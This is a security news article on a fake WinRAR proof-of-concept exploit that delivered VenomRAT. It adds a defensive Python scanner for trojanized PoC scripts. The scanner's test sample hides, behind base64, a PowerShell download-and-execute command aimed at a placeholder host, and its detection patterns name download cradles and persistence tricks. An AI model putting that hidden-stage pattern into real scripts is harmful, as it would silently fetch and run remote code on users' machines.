Fake WinRAR PoC Exploit Conceals VenomRAT Malware

Published: 23/11/2024   Category: security




A supposed exploit for a notable RCE vulnerability in the popular Windows file-archiving utility delivers a big sting for unwitting researchers and cybercriminals.



In a new twist on the cybercrime penchant for trojanizing things, a threat actor recently pounced upon a hot vulnerability disclosure to create a fake proof of concept (PoC) exploit that concealed the VenomRAT malware.
According to research from Palo Alto Networks, the cyberattacker, who goes by whalersplonk, took advantage of a very real remote code execution (RCE) security bug in WinRAR (CVE-2023-40477) that was made public on Aug. 17. The attacker quickly pulled together a convincing but fake PoC for the bug and pushed it to a GitHub repository the same week, knowing that the flaw would attract attention; WinRAR, after all, has more than 500 million users worldwide.
The fake PoC looked plausible because it was adapted from a publicly available PoC script for a SQL injection vulnerability in the GeoServer application, according to the researchers; it did not exploit the WinRAR flaw at all. In reality, once run, it kicked off an infection chain that ended with the VenomRAT payload being installed on the victim's computer.
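The tactic described above, a script whose visible code looks like a PoC while a concealed stage fetches and runs something else, can be triaged before anything from an untrusted repository is executed. The following Python script is an added example written for this article; it is not code from Palo Alto Networks, from the repository the researchers analysed, or from WinRAR. The two PoC snippets it scans are constructed stand-ins, the regular expressions are heuristics chosen for the example, and example.invalid is a reserved placeholder hostname. It decodes long base64 runs and rescans each recovered layer, because a download cradle hidden inside an encoded blob is exactly what a "PoC" for a local file-format bug has no reason to contain.

```python
import base64
import binascii
import re

# Heuristics for behaviour a single-purpose PoC rarely needs (chosen for this
# added example; tune the lists to what you expect a genuine PoC to do).
SUSPICIOUS_PATTERNS = {
    "download_cradle": re.compile(
        r"(Invoke-WebRequest|DownloadString|DownloadFile|curl\s+-o|wget\s+"
        r"|urllib\.request|requests\.get)", re.IGNORECASE),
    "encoded_command": re.compile(
        r"(-EncodedCommand|-enc\b|FromBase64String|base64\.b64decode)", re.IGNORECASE),
    "dynamic_exec": re.compile(r"\b(exec|eval|IEX|Invoke-Expression)\s*\(", re.IGNORECASE),
    "persistence": re.compile(
        r"(CurrentVersion\\Run|schtasks|New-ScheduledTask|\\Startup\\)", re.IGNORECASE),
    "child_process": re.compile(
        r"(subprocess\.(Popen|run|call)|os\.system|os\.popen|powershell(\.exe)?)",
        re.IGNORECASE),
}

# A run of 80+ base64 characters is too long for an ordinary literal and is
# worth decoding and scanning as a layer of its own.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")


def find_b64_blobs(text):
    """Strictly decode every long base64-looking run; skip runs that fail."""
    blobs = []
    for m in B64_BLOB.finditer(text):
        try:
            blobs.append(base64.b64decode(m.group(0), validate=True))
        except (binascii.Error, ValueError):
            continue
    return blobs


def triage(source, max_depth=3):
    """Scan source plus up to max_depth layers of embedded base64.

    Returns a sorted list of (layer, category, matched_text); layer 0 is the
    visible script, layer n is text recovered after n nested decodes.
    """
    findings = set()
    pending = [(0, source)]
    while pending:
        depth, text = pending.pop()
        for category, pattern in SUSPICIOUS_PATTERNS.items():
            for m in pattern.finditer(text):
                findings.add((depth, category, m.group(0)))
        if depth >= max_depth:
            continue
        for blob in find_b64_blobs(text):
            findings.add((depth, "embedded_base64", f"{len(blob)} bytes"))
            pending.append((depth + 1, blob.decode("utf-8", errors="replace")))
    return sorted(findings)


def verdict(findings):
    """REJECT when risky behaviour is hidden behind an encoding layer or a
    visible cradle feeds an executor; REVIEW for anything else flagged."""
    hidden = {cat for depth, cat, _ in findings if depth > 0}
    top = {cat for depth, cat, _ in findings if depth == 0}
    if hidden & {"download_cradle", "child_process", "persistence", "encoded_command"}:
        return "REJECT"
    if "download_cradle" in top and top & {"dynamic_exec", "child_process"}:
        return "REJECT"
    return "REVIEW" if findings else "OK"


# Constructed stand-in for a single-purpose PoC: it only writes a malformed file.
BENIGN_POC = '''\
with open("crafted.rar", "wb") as f:
    f.write(b"A" * 4096)
'''

# Constructed stand-in for a trojanized PoC: same visible behaviour, plus a
# hidden second stage (example.invalid is a reserved placeholder hostname).
_HIDDEN_STAGE = base64.b64encode(
    b'powershell -w hidden -c "IEX (New-Object Net.WebClient)'
    b'.DownloadString(\'http://example.invalid/stage\')"').decode()
TROJANIZED_POC = f'''\
import base64, subprocess
with open("crafted.rar", "wb") as f:
    f.write(b"A" * 4096)
subprocess.run(base64.b64decode("{_HIDDEN_STAGE}").decode(), shell=True)
'''

if __name__ == "__main__":
    for name, poc in (("benign", BENIGN_POC), ("trojanized", TROJANIZED_POC)):
        findings = triage(poc)
        print(f"{name}: {verdict(findings)}")
        for layer, category, match in findings:
            print(f"  layer {layer}: {category}: {match}")
```

The benign stand-in produces no findings and is rated OK; the trojanized one is rated REJECT because the decoded layer contains a PowerShell download cradle that the visible script never shows. A static pass like this is a first filter, not a substitute for detonating the script in an isolated sandbox with network capture.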
VenomRAT appeared for sale in Dark Web forums over the summer, loaded with spyware and persistence capabilities.
While this sort of gambit would at first appear to be part of the tried-and-true tradition of targeting security researchers with espionage tools, Palo Alto researchers think it was actually more of a lark for the perpetrator.
"It is likely [that] the actors are opportunistic and looking to compromise other miscreants trying to adopt new vulnerabilities into their operations," according to the firm's research, issued Sept. 19. "The actors acted quickly to capitalize on the severity of an RCE in a popular application."





